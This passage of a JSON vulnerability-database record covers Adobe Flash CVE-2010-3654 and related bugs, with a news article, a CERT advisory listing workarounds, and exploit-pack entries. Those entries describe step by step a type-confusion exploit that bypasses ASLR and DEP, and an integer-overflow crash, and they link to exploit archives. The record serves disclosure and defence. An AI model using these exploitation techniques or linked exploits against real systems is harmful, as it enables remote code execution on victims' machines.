platforms, including Android, as well as Reader on Windows and Mac, and won\u2019t be patched for nearly two weeks.\n\nThe new Flash bug came to light early Thursday when a researcher posted information about the problem, as well as a Trojan that is exploiting it and dropping a pair of malicious files on vulnerable PCs. 
Researcher [Mila Parkour tested the bug and posted a screenshot](<http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html>) of the malicious files that a Trojan exploiting the vulnerability drops during its infection routine. Adobe has since confirmed the vulnerability and said that it is aware of the attacks against Reader.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said.\n\nThis flaw is the latest in a string of bugs that have cropped up in Adobe products in the last few months. There have been a number of critical flaws exposed in Flash, Reader and other Adobe software, including one in the company\u2019s Shockwave application, which it is patching on Thursday. The Shockwave flaw is remotely exploitable and the details of it have been known publicly for some time. \n\nAdobe security officials said they plan to patch the Flash bug on Nov. 9 and will release a fix for Reader and Acrobat during the week of Nov. 15. 
\n", "modified": "2018-08-15T10:16:56", "published": "2010-10-28T14:03:47", "id": "THREATPOST:2606196DD3F3AF9E687F63426BF161F9", "href": "https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/74617/", "type": "threatpost", "title": "New Adobe Flash Bug Being Exploited", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:07", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "### Overview \n\nAdobe Flash 10.1.85.3 contains a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nAdobe Flash 10.1.85.3 and earlier versions as well as 10.2.161.23 and earlier 10.2 preview versions contain a vulnerability that can result in memory corruption, which can allow arbitrary code execution. Any application that supports Flash or provides its own runtime may be vulnerable. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Adobe Flash 10.1.102.64. More details are available in Adobe Security Bulletin [APSB10-26](<http://www.adobe.com/support/security/bulletins/apsb10-26.html>). Adobe Reader and Acrobat 9.4.1 address this issue. More details are available in [APSB10-28](<http://www.adobe.com/support/security/bulletins/apsb10-28.html>). 
For other affected products, please see Adobe Security Bulletin [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) and consider the following workarounds: \n \n--- \n \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9** \n \nFlash and 3D & Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks that use an SWF embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results not in a crash but in a more user-friendly error message. \n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \nFor Apple Mac OS X, delete or rename these files: \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \nFile locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. 
\n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that are installed with Adobe Reader or other Adobe products. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically opening in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. 
Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox.\n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n--- \n \n### Vendor Information\n\n298081\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Adobe __ Affected\n\nNotified: October 27, 2010 Updated: November 17, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSee below.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/advisories/apsa10-05.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-26.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-28.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb10-26.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-05.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-28.html>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-3654](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-3654>) \n---|--- \n**Severity Metric:** | 43.54 \n**Date Public:** | 2010-10-28 \n**Date First Published:** | 2010-10-28 \n**Date Last Updated: ** | 2010-11-17 17:39 UTC \n**Document Revision: ** | 27 \n", "modified": "2010-11-17T17:39:00", "published": "2010-10-28T00:00:00", "id": "VU:298081", "href": "https://www.kb.cert.org/vuls/id/298081", "type": "cert", "title": "Adobe Flash code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash Player 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)", "edition": 1, "published": "2011-04-19T00:00:00", "title": "Adobe Flash Player 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2011-04-19T00:00:00", "id": "EXPLOITPACK:3AD9D29B4D1CC018F70F8B0E9B899EC2", "href": "", "sourceData": 
"Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/\n\nAdobe Flash player Action script type confusion exploit (DEP+ASLR bypass)\n\nadvisory text : \n\nHere is another reliable windows 7 exploit . the main method used for exploitation is based on Haifei-li presentation at CanSecWest. \nbut as exploit code not relased and a lot of peoples like to see exploit code here is our code . \n\nexploitation detail :\nFor exploitation purpose on recent protections on windows 7 without any 3rd party (well flash is not 3rd party todays) , it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address.\n\nStep1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.\nStep2: leak address of the shellcode with the same pointer and NewNumber trick.\nStep3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.\nStep4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. 
And thus address of our rop payload will be used as vtable in the fake class object.\nNote: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.\n\nHere you can get our reliable exploit against windows 7 :\ncalc.exe payload\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash - ActionIf Integer Denial of Service", "edition": 1, "published": "2010-11-05T00:00:00", "title": "Adobe Flash - ActionIf Integer Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2010-11-05T00:00:00", "id": "EXPLOITPACK:92497A482BC4B4CFEF587918EBBCB69E", "href": "", "sourceData": "Adobe Flash Integer Overflow \nAuthor: Matthew Bergin\nDate: June 15, 2010\nVersions Affected: Flash10e.ocx v10.0.45.2\n\t\t Flash10c.ocx v10.0.32.18 r32\nRoot Cause: ActionScript, \"ActionIf\"\nAffect: Denial-of-Service, possible Command Execution\nCVE: CVE-2010-3639\nDesc: When Parsing an ActionIf ActionScript statement four args are passed\n to the function, an integer named i , a ubyte named ActionCode, a ushort\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \n smaller it will cause an Access Violation when reading data from a \n invalid memory address. The last 16-bits of the address are controlable\n with the size of the BranchOffset argument. Any data which is in a valid\n segment of memory near the controlled address can be read causing Memory\n Disclosure. This would be used well in combination with a memory corruption\n vulnerability in order to bypass ASLR. 
\n\n In doing my initial research I found a lot of interesting things along the way.\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\n the integer overflow in Flash10c while fuzzing SWF. I didnt fuzz it via a web\n browser but instead used a free application which uses the modules in a more\n direct manner. Flash10c is not able to be attacked via a browser as far as I\n have been able to tell. However, I have found during my research that Flash10e\n is loaded as a module when any Flash object is encountered. I am unsure as to\n if this is a configuration issue or not. In addition to this, while debugging\n this issue I found that both versions have a self-changing CRC which inhibits\n keeping break points set.\n\n Another interesting note is that when confirming the PoC on Flash Movie Player\n i noticed that if you open the file with the File -> Open drop down menu, the\n PoC will not hit the vulnerable code causing a crash. However, if you register\n the swf extension to Flash Movie Player and \"double-click\" the PoC file to run\n it, Flash Movie Player will hit the vulnerable code every time. 
\n\n The PoC code would be best embedded into HTML for remote attacks but can be\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\n into memory.\n\n\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\n\nCrash Details:\n\nAccess Violation\nException caught at 1009cb23 mov al,[eax+ecx]\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\n\nReversing:\n\nstruct SWFTAG Tag[7], value DoAction\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\nint i, value 0\nubyte ActionCode, value 157\nushort Length, value 2\nshort BranchOffset, value -305\n\nBranchOffset is located @ E6h-E7h\n\nPoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2019-05-29T17:21:53", "bulletinFamily": "info", "cvelist": ["CVE-2010-3636"], "description": "\n ## Description\n\nWhen Flash Player references a different website than the site where Flash contents are hosted, the referenced site must be allowed access by the cross-domain policy file. \n \nFlash Player contains a vulnerability where access restrictions set by the cross-domain policy file may be bypassed.\n\n ## Impact\n\nCross-domain policy restrictions can be bypassed by using a specially crafted web page. 
This could result in unauthorized access to website data.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Adobe Flash Player 10.1.85.3 and earlier for Windows, Macintosh, Linux, and Solaris\n * Adobe Flash Player 10.1.95.1 for Android\n", "edition": 4, "modified": "2010-11-09T00:00:00", "published": "2010-11-09T00:00:00", "id": "JVN:48425028", "href": "http://jvn.jp/en/jp/JVN48425028/index.html", "title": "JVN#48425028: Flash Player access restriction bypass vulnerability", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}